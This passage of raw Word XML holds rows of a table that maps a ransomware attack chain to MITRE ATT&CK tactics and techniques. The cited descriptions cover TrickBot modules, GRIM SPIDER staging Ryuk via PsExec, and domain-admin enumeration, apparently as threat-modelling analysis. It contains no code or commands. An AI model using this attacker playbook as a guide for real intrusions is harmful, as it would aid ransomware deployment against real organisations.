            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="001207D8" w:rsidRPr="005B41A3">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>“Enumerating domain admins with net group”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22734" w:rsidRPr="004A553D" w14:paraId="2CB17270" w14:textId="77777777" w:rsidTr="00EC7F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F9A87B" w14:textId="01F86136" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C138FF" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB45EF5" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EABD26B" w14:textId="08594575" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00D4300F" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B41E8C" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4904CC3B" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581BD883" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F4DF4B4" w14:textId="77777777" w:rsidR="00B22734" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C42812">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C42812">
              <w:t xml:space="preserve"> downloads modules for collecting local system information and scouting the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001207D8" w:rsidRPr="005B41A3" w14:paraId="64C9E085" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618A40CE" w14:textId="542D3DB3" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE4F861" w14:textId="34747C08" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">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0008 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E195709" w14:textId="3A36A8C4" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1570 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2CDE26" w14:textId="26412722" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D52FE2C" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17046C8A" w14:textId="25802C08" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43ED9176" w14:textId="6417351D" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF22D8B" w14:textId="0D6ECBE5" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00D02419" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00D02419">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Once GRIM SPIDER has gained access to credentials and a Domain Controller, or other host management server, they would then stage the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D02419">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Ryuk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D02419">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware on that system and deploy to targets via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D02419">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>PsExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0036256B" w:rsidRPr="0036256B" w14:paraId="67FF6BAE" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64F4E963" w14:textId="5EFABCCF" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22AA7014" w14:textId="21723EE4" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0040 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9A856E" w14:textId="2631FA46" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1486 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Encrypted For Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65FDC8D1" w14:textId="324C8FFF" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540DDD81" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32F78710" w14:textId="3B3C1D7D" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D054B8D" w14:textId="790D652E" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>AO-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3038CA" w14:textId="046C3420" w:rsidR="001207D8" w:rsidRPr="0036256B" w:rsidRDefault="0036256B" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0036256B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>[2] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="143"/>
      <w:tr w:rsidR="001207D8" w:rsidRPr="005B41A3" w14:paraId="7A6BEB7C" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0323BA5F" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB171F5" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6D7443" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1811F7EA" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04607E7A" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E0BB78" w14:textId="77777777" w:rsidR="001207D8" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C849BB6" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46565E49" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00187965" w:rsidRPr="005B41A3" w14:paraId="70760760" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09EADF4A" w14:textId="24787B0E" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1284E198" w14:textId="6060302B" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ECF312E" w14:textId="6524D276" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9E6496" w14:textId="7E121F62" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0085B526" w14:textId="77777777" w:rsidR="00187965" w:rsidRPr="005B41A3" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24832070" w14:textId="478CD6F5" w:rsidR="00187965" w:rsidRDefault="00187965" w:rsidP="00187965">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
